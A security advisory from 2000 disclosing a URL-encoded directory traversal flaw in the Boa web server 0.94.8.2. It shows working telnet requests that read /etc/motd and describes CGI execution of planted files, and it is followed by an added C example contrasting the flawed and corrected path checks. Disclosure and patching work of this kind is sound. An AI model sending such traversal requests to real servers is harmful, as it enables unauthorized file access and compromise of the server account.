
Title: Vulnerability in BOA web server v0.94.8.2
Released by: S21SEC
Date: 3rd October 2000
###############################################################
ID: S21SEC-005-en
Title: Vulnerability in BOA web server v0.94.8.2
Date: 03/10/2000
Status: Vendor contacted, patch available
Scope: Arbitrary file access
Platforms: Unix
Author: llmora
Location: http://www.s21sec.com/en/avisos/s21sec-005-en.txt
Release: Public
###############################################################



S 2 1 S E C

http://www.s21sec.com

Vulnerability in BOA web server v0.94.8.2

There is a security bug in BOA v0.94.8.2 that allows a malicious
user to access files outside the document root of the web server
as the user the server runs as.

About BOA
---------

Boa is an open source high performance web server for Unix-alike
computers (http://www.boa.org). It does file serving and dynamic
content generation via CGI.



Vulnerability description
-------------------------

- Reading any file in the web server

The boa web server suffers from the well-known "../.." web server
problem. If we request a document from the web server
using the "../.." technique, we get:

homer:~$ telnet ilf 80
Escape character is '^]'.
GET /../../../../../../../../../../../etc/motd HTTP/1.0

HTTP/1.0 404 Not Found

404 Not Found
404 Not Found
The requested URL /etc/motd was not found on this server.
Connection closed by foreign host.
homer:~$

So apparently it doesn't work, as boa checks for "/.." in the path.
By URL-encoding the "." in the request, we are able to skip the ".."
test, allowing us to access the contents of any file the user
running the web server has access to:

homer:~$ telnet ilf 80
GET /%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/motd HTTP/1.0

HTTP/1.0 200 OK
[... the /etc/motd file content is shown]
Connection closed by foreign host.
homer:~$

If the administrator enables extension based CGI support with a
line like this in the boa.conf file:

AddType application/x-httpd-cgi cgi

then a request for a file ending in .cgi will result in the file
being executed with the privileges of the user id running the web
server. This file can be placed in any folder throughout the file
system, not strictly under the DocumentRoot, and be accessed using
the previous bug, leading to compromise of the web server account.

Affected versions
-----------------

This bug has been tested and verified to be present in v0.94.8.2 of
the boa web server. Version 0.92 of boa is not affected by this
problem.

Fix information
---------------

The boa development team has released v0.94.8.3 which fixes this
vulnerability. Upgrades are available at the vendor website
(http://www.boa.org).

S21SEC wishes to thank the boa development team for acknowledging
the issue and releasing a security patch in a matter of hours.

Additional information
----------------------

This vulnerability was found and researched by:

Lluis Mora llmora@s21sec.com

You can find the latest version of this advisory at:

http://www.s21sec.com/en/avisos/s21sec-005-en.txt

And other S21SEC advisories at http://www.s21sec.com/en/avisos/
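The check-order problem described under "Vulnerability description", modelled as an added example; it is not Boa's source code and not part of the original advisory. The function names are hypothetical and the sample URI is a constructed, shortened form of the advisory's request.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Percent-decode src into dst (dst sized like src); -1 on bad escape or NUL. */
int url_decode(const char *src, char *dst) {
    while (*src) {
        if (*src != '%') { *dst++ = *src++; continue; }
        if (!isxdigit((unsigned char)src[1]) || !isxdigit((unsigned char)src[2]))
            return -1;
        char hex[3] = { src[1], src[2], '\0' };
        long v = strtol(hex, NULL, 16);
        if (v == 0) return -1;
        *dst++ = (char)v;
        src += 3;
    }
    *dst = '\0';
    return 0;
}

/* True if any '/'-separated segment of p is exactly "..". */
int has_dotdot_segment(const char *p) {
    while (*p) {
        size_t n = strcspn(p, "/");
        if (n == 2 && p[0] == '.' && p[1] == '.') return 1;
        p += n;
        if (*p == '/') p++;
    }
    return 0;
}

/* Model (not Boa's code) of the described order: filter raw URI, then decode. */
int check_then_decode(const char *uri, char *out) {
    if (strstr(uri, "/..")) return 0;      /* test runs on the encoded text */
    return url_decode(uri, out) == 0;      /* 1 = request accepted */
}

/* Corrected order: decode first, then test the decoded path. 1 = accepted. */
int decode_then_check(const char *uri, char *out) {
    return url_decode(uri, out) == 0 && !has_dotdot_segment(out);
}

int main(void) {
    char out[64];
    const char *uri = "/%2E%2E/%2E%2E/etc/motd"; /* constructed sample */
    int before = check_then_decode(uri, out), after = decode_then_check(uri, out);
    printf("check-then-decode=%d decode-then-check=%d\n", before, after);
    return 0;
}
```

Testing the decoded path for ".." is the minimum; a server should also resolve the final path and confirm it still lies under the document root before opening the file.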





